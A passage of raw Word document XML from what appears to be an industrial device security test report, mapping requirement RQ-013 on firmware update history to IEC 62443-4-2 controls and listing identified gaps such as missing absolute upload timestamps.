              <w:t>Result</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="11F0576B" w14:textId="52158A4B" w:rsidR="001872E8" w:rsidRPr="006D5B99" w:rsidRDefault="001872E8" w:rsidP="001872E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 xml:space="preserve">As TC-RQ003-04 </w:t>
            </w:r>
            <w:r w:rsidR="00CA0401" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:color w:val="EE0000"/>
              </w:rPr>
              <w:t xml:space="preserve"> -</w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:color w:val="EE0000"/>
              </w:rPr>
              <w:t xml:space="preserve"> only a relative uptime reference, no absolute timestamp.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="767F64DD" w14:textId="77777777" w:rsidR="00516341" w:rsidRPr="006D5B99" w:rsidRDefault="00516341" w:rsidP="00516341">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="104D5F02" w14:textId="77777777" w:rsidR="00516341" w:rsidRPr="006D5B99" w:rsidRDefault="00516341" w:rsidP="00516341">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="034298C9" w14:textId="77777777" w:rsidR="00516341" w:rsidRPr="006D5B99" w:rsidRDefault="00516341" w:rsidP="00516341">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="04E79D2F" w14:textId="77777777" w:rsidR="00530E8C" w:rsidRPr="006D5B99" w:rsidRDefault="00530E8C" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5870DE7C" w14:textId="77777777" w:rsidR="00530E8C" w:rsidRPr="006D5B99" w:rsidRDefault="00530E8C" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06C85643" w14:textId="77777777" w:rsidR="00530E8C" w:rsidRPr="006D5B99" w:rsidRDefault="00530E8C" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="35ED621E" w14:textId="77777777" w:rsidR="00530E8C" w:rsidRPr="006D5B99" w:rsidRDefault="00530E8C" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00CEC899" w14:textId="77777777" w:rsidR="000A35E2" w:rsidRPr="006D5B99" w:rsidRDefault="000A35E2" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46B5816E" w14:textId="77777777" w:rsidR="000A35E2" w:rsidRPr="006D5B99" w:rsidRDefault="000A35E2" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13C4BD86" w14:textId="77777777" w:rsidR="000A35E2" w:rsidRPr="006D5B99" w:rsidRDefault="000A35E2" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1ED1B8FF" w14:textId="77777777" w:rsidR="000A35E2" w:rsidRPr="006D5B99" w:rsidRDefault="000A35E2" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A4F29E5" w14:textId="77777777" w:rsidR="000A35E2" w:rsidRPr="006D5B99" w:rsidRDefault="000A35E2" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7020A4FC" w14:textId="77777777" w:rsidR="000A35E2" w:rsidRPr="006D5B99" w:rsidRDefault="000A35E2" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="01221674" w14:textId="77777777" w:rsidR="000A35E2" w:rsidRPr="006D5B99" w:rsidRDefault="000A35E2" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="646243DF" w14:textId="77777777" w:rsidR="000A35E2" w:rsidRPr="006D5B99" w:rsidRDefault="000A35E2" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="35599D3F" w14:textId="77777777" w:rsidR="000A35E2" w:rsidRPr="006D5B99" w:rsidRDefault="000A35E2" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D9779DD" w14:textId="77777777" w:rsidR="000A35E2" w:rsidRPr="006D5B99" w:rsidRDefault="000A35E2" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A1EB996" w14:textId="77777777" w:rsidR="000A35E2" w:rsidRPr="006D5B99" w:rsidRDefault="000A35E2" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5106866A" w14:textId="77777777" w:rsidR="000A35E2" w:rsidRPr="006D5B99" w:rsidRDefault="000A35E2" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="245CA907" w14:textId="77777777" w:rsidR="000A35E2" w:rsidRPr="006D5B99" w:rsidRDefault="000A35E2" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6BE996DE" w14:textId="77777777" w:rsidR="00EB685C" w:rsidRPr="006D5B99" w:rsidRDefault="00EB685C" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5EEF353B" w14:textId="77777777" w:rsidR="00CE0BBA" w:rsidRPr="006D5B99" w:rsidRDefault="00CE0BBA" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3649BCFE" w14:textId="77777777" w:rsidR="002135BB" w:rsidRPr="006D5B99" w:rsidRDefault="002135BB" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37124CD6" w14:textId="3ECF6B07" w:rsidR="009C0A46" w:rsidRPr="006D5B99" w:rsidRDefault="009C0A46" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="double"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="double"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>REQUIREMENT 13</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="541A7F90"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77BEE934" w14:textId="746DA1BD" w:rsidR="00941153" w:rsidRPr="006D5B99" w:rsidRDefault="007F5A7B" w:rsidP="00AC18F9">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">MVO-ID: </w:t>
      </w:r>
      <w:r w:rsidR="00941153" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>RQ-013</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72056560" w14:textId="35DE6FB9" w:rsidR="00941153" w:rsidRPr="006D5B99" w:rsidRDefault="00941153" w:rsidP="00AC18F9">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>MVO Requirement Text:</w:t>
      </w:r>
      <w:r w:rsidRPr="006D5B99">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191E3FBD" w:rsidR="00941153" w:rsidRPr="006D5B99" w:rsidRDefault="007F5A7B" w:rsidP="00AC18F9">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>IEC 62443-4-2 CR</w:t>
      </w:r>
      <w:r w:rsidR="00306DEC" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001D4045" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Mapping</w:t>
      </w:r>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B80D93" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="00941153" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> CR 2.8, CR 2.9</w:t>
      </w:r>
      <w:r w:rsidR="000707BE" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, CR 2.10, CR 2.11, CR 3.9, CR 6.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="606E216D" w14:textId="3A5751BD" w:rsidR="00941153" w:rsidRPr="006D5B99" w:rsidRDefault="007F5A7B" w:rsidP="00AC18F9">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Target Assets: </w:t>
      </w:r>
      <w:r w:rsidR="00941153" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>I (Audit Data); D (Safety Sofware)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C053EF1" w14:textId="21C90939" w:rsidR="00941153" w:rsidRPr="006D5B99" w:rsidRDefault="00196EB6" w:rsidP="00AC18F9">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>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F256F0" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">(Tampering,) </w:t>
      </w:r>
      <w:r w:rsidR="00941153" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Repudiation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BB21B04" w14:textId="77777777" w:rsidR="00192CFC" w:rsidRPr="006D5B99" w:rsidRDefault="007F5A7B" w:rsidP="00AC18F9">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Security Function (Mitigation): </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A7DFACE" w14:textId="72D2B5B4"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/deviceinfo/swrevision, /firmware/version: Current version exposed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E0B777E" w14:textId="2568FC5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I&amp;M0 SOFTWARE_REVISION / I&amp;M5 annotation (SRIO-3002/3023).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58F401A0" w14:textId="6D8C4C0D"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Release Notes per release (SRIO-16242): external, not per-serial.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23EF43B3" w14:textId="6EDF3D11" w:rsidR="003D4AE9" w:rsidRPr="006D5B99" w:rsidRDefault="003D4AE9" w:rsidP="00AC18F9">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SysCom UPDATE_COMPLETED event  (SRIO-10785).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="329CAC8A" w14:textId="77777777" w:rsidR="00563C13" w:rsidRPr="006D5B99" w:rsidRDefault="007F5A7B" w:rsidP="00AC18F9">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Identified Gap: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30BF6482" w14:textId="5702DD21"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4657E31C" w:rsidR="00FF0566" w:rsidRPr="006D5B99" w:rsidRDefault="00FF0566" w:rsidP="00AC18F9">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">G-2: 5 years after each upload’ requires a per-upload absolute timestamp. With no RTC and uptime reset on cold start (the install forces a cold start), the device cannot timestamp an upload at all </w:t>
      </w:r>
      <w:r w:rsidR="007F04F8" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> --&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> even a hypothetical history would be undatable and the per-upload retention clock cannot be started. This is the finding no external record can cure for a specific physical unit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79A907E5" w14:textId="0A0371AD" w:rsidR="00FA1D08" w:rsidRPr="006D5B99" w:rsidRDefault="00FF0566" w:rsidP="00AC18F9">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>G-3: Not device-resident, not per-serial, not tamper-evident, no guaranteed 5-year per-upload retention, no per-upload timestamp.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="489BF0C1" w14:textId="77777777" w:rsidR="003404D5" w:rsidRPr="006D5B99" w:rsidRDefault="003404D5" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5DCE53BC" w14:textId="77777777" w:rsidR="003404D5" w:rsidRPr="006D5B99" w:rsidRDefault="003404D5" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7AC3DF9C" w14:textId="77777777" w:rsidR="003404D5" w:rsidRPr="006D5B99" w:rsidRDefault="003404D5" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3FBEA6C7" w14:textId="77777777" w:rsidR="003404D5" w:rsidRPr="006D5B99" w:rsidRDefault="003404D5" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="763EDD2F" w14:textId="77777777" w:rsidR="003404D5" w:rsidRPr="006D5B99" w:rsidRDefault="003404D5" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E43DC71" w14:textId="77777777" w:rsidR="003404D5" w:rsidRPr="006D5B99" w:rsidRDefault="003404D5" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E482453" w14:textId="77777777" w:rsidR="003404D5" w:rsidRPr="006D5B99" w:rsidRDefault="003404D5" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="47F81BE3" w14:textId="77777777" w:rsidR="003404D5" w:rsidRPr="006D5B99" w:rsidRDefault="003404D5" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="43287700" w14:textId="77777777" w:rsidR="003404D5" w:rsidRPr="006D5B99" w:rsidRDefault="003404D5" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="38B74469" w14:textId="77777777" w:rsidR="003404D5" w:rsidRPr="006D5B99" w:rsidRDefault="003404D5" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4291DF52" w14:textId="77777777" w:rsidR="003404D5" w:rsidRPr="006D5B99" w:rsidRDefault="003404D5" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="028A63DC" w14:textId="77777777" w:rsidR="003404D5" w:rsidRPr="006D5B99" w:rsidRDefault="003404D5" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46C30C86" w14:textId="77777777" w:rsidR="003404D5" w:rsidRPr="006D5B99" w:rsidRDefault="003404D5" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E73EA94" w14:textId="77777777" w:rsidR="003404D5" w:rsidRPr="006D5B99" w:rsidRDefault="003404D5" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7FCE4CE5" w14:textId="77777777" w:rsidR="003404D5" w:rsidRPr="006D5B99" w:rsidRDefault="003404D5" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C81EC33" w14:textId="77777777" w:rsidR="003404D5" w:rsidRPr="006D5B99" w:rsidRDefault="003404D5" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5BAAE3A2" w14:textId="77777777" w:rsidR="00FD7AE4" w:rsidRPr="006D5B99" w:rsidRDefault="00FD7AE4" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7BF5FE26" w14:textId="77777777" w:rsidR="00FD7AE4" w:rsidRPr="006D5B99" w:rsidRDefault="00FD7AE4" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="282AEADB" w14:textId="77777777" w:rsidR="00FD7AE4" w:rsidRPr="006D5B99" w:rsidRDefault="00FD7AE4" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D9E9866" w14:textId="77777777" w:rsidR="003404D5" w:rsidRPr="006D5B99" w:rsidRDefault="003404D5" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="60172189" w14:textId="77777777" w:rsidR="003404D5" w:rsidRPr="006D5B99" w:rsidRDefault="003404D5" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3ABC6C01" w14:textId="6849538C" w:rsidR="009C0A46" w:rsidRPr="006D5B99" w:rsidRDefault="009C0A46" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Step 2: Methodological Test Planning</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6988365B"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6D5B99" w:rsidRDefault="00900880" w:rsidP="005C021F">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3969" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0337278F"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5F558DC"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605EEDCD"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34D5C86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6341" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="00906341" w:rsidP="00906341">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3969" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3EC9A2D6" w14:textId="1A06524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only the current version is exposed (no historical/previous-version fields) via IoT-Core + I&amp;M</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5878C62E" w14:textId="7F8F956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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2097" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="42639D49" w14:textId="77777777"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Requirements-based verification; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2C57B5C5" w14:textId="0295BF95"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NIST SP 800-115 §3.2</w:t>
